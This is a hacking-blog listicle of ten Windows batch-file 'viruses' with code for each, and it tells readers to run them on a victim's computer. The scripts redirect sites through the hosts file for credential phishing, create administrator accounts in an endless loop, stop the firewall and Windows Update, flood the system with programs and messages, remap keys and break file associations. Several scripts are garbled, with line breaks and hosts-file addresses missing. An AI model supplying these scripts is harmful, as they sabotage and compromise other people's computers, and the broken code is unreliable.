Top 10+ Amazing Notepad Viruses | Batch Programming

Hey! here toady we are going to show you top 10 batch programs or notepad viruses. These are most harmless and useful viruses for ethical hackers and blackhat hackers. Basically we will write viruses in batch programming. Batch programming is a most useful programming for hackers and crackers but we can use it for our different purposes. In this article our purpose of using batch programming is making notepad viruses. So let's start, 

Also Read: Complete Batch Programming Part 1 | Learn Batch Commands

Disclaimer: All that information given in this Article is only for educational means, and the author of this blog will not hold responsibility for whatever you mess with this stuff.

Top 10 Amazing Notepad Viruses | Batch Programming

#1 Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code
cd\cd C:\Documents and Settings\username\Desktop:loopmd Virus cd Virus goto loop
2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on. Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code. 

#2 DNS poisoning:

Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.
@echo offecho >> C:\windows\system32\drivers\etc\hosts.txtecho >> C:\windows\system32\drivers\etc\hosts.txt exit 
This program creates a new entry in the hosts file, so that whenever an user attempts to move to, he will be re-directed to another host that has the IP address of, likewise if the user attempts to login to the paypal account by typing in, he will be re-directed to another external bogus website that has the IP address of, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes. 

#3 Application Bomber: 

Application bomber is a superset of window bomber, this has a close relation to the above given fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself (simply known as fork), where as we are going to open up applications continuously using a loop.
@echo off:loop start notepad start winword start mspaint start write start cmd start explorer start control start calc goto loop  
 When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.

#4 Msg Annoyer: 

Message annoyer is a batch program that uses the same concept as above, but will interact with the user anyhow annoying and irritating them by popping up some message box containing some messages in it.
@echo off :annoy msg * Hi there! msg * How u doin ? msg * Are you fine ? msg * Never mind about me.... msg * I am not here to annoy you.... msg * I am caring for you..... msg * start counting from 1 to 5, i Will be outta this place..... msg * 1 msg * 2 msg * 3 msg * 4 msg * 5 goto annoy 
This program will pops up a small message box
This message box will pop up until for endless loop, which really annoys the person sitting before the computer. Even these small popup windows may crash the computer, if it overloads the memory.

#5 User Flooder:  

The ‘user flooder’ program will create a number of user accounts with random numbers, and assign administrator rights to them by itself, moreover the password set for those user accounts were too random numbers.
@echo off:usrflood set usr=%random% net users %usr% %random% /add net localgroup administrators %usr% /add goto usrflood  
the ‘%random%’ is an environment variable that generates a random positive integer. We have set a variable manually named ‘usr’ for holding the random number generated by the %random%, then a new user account is created with the generated number as the account name and was assigned with a random password, then assigned with administrator rights, and this process gets repeated for a infinite loop, so it will create more than 50 user accounts in less than a minute. This will sure degrade the computer performance and the user will take a long long time to delete the user accounts, sometimes they will simply format their hard drives.

#6 Matrix Folder flooder:  

The following piece of code is going to help flood you computer with junky folders. This program has the tendency to create more than 3000 folders in just less than a minute.
@echo off:loop mkdir %random% goto loop  

#7 Service Disabler:  

The following piece of code is used for stopping some critical windows services.
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
This program when executed will stop the ‘windows firewall’ service that is required to block unwanted datagram’s coming from the internet, ‘windows update’ service that is required to update windows patches and so on, ‘workstation’ service that is required for the computer to establish a peer to peer connection, ‘DHCP Client’ service that is required to register an available IP address from the DHCP server, ‘DNS Client’ service that is required to resolve FQDN (Fully qualified Domain Name) into its equivalent IP address, ‘print spooler’ service that is required to load the document to be printed in the spool, and then the ‘themes’ service that is required to offer Themes and other graphical appearance. Likewise you may stop any of the services, even the anti-virus service that offers protection from malwares will be stopped in this way. So when these services get stopped, it almost becomes impossible for the machine to offer the service what they are supposed to do so, hence the user has to manually enable and start these services again.

#8 Broadcast Bomber: 

The ‘broadcast bomber’ will broadcast messages infinitely to all the computers connected to this computer, if it is in a network. Likewise the ‘msg flooder’ program that we have seen already, this helps people to annoy multiple people sitting and working in front of various other computers connected with the same network.
@echo off :netannoy net send * Hi there! net send * How u doin ? net send * Are you fine ? net send * Never mind about me.... net send * I am not here to annoy you.... net send * I am caring for you..... net send * start counting from 1 to 5, i Will be outta this place..... net send * 1 net send * 2 net send * 3 net send * 4 net send * 5 goto netannoy
When the above piece of code gets executed, it will display a pop up windows.
On all the computers that are connected with the same network, there by annoying everyone who uses the entire network.

#9 Keystroke Re-mapper:

The following piece of batch program helps re-map the keystroke by changing the ‘scancodemap’ entry in the registry editor. The code that I have enclosed here changes the key from A to B, so that if any users press ‘a’ key on the keyboard he will be getting the ‘b’ displayed on the screen, likewise you may map any keys.
@echo off reg add "HKLM\System\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 00000000000000000200000030001e0000000000 exit
If you want to create a new batch file for remapping other keys, you have to refer the ascii codes for each keys that was pre assigned, and you can download it from  

#10 Ext_changer: 

This virus program is created by misusing the assoc command. The ‘assoc’ command is used for associating an extension with the appropriate file type, for example .txt extensions are supposed to be associated with textiles and so on.
@echo offtitle Ext_changer color a Rem This Virus file replaces the actual file extensions with the given extensions @echo off assoc .txt=jpegfile assoc .exe=htmlfile assoc .jpeg=avifile assoc .png=mpegfile assoc .mpeg=txtfile assoc .sys=regfile msg Your System got Infected….. exit 
Here we are associating the native file extensions with some other type of file, which makes the program unable to open or display the file in right format.

Also Read: Top 10 Famous Hackers In The World

Thanks For Visiting.
 This will Update Keep Visiting.

Post a Comment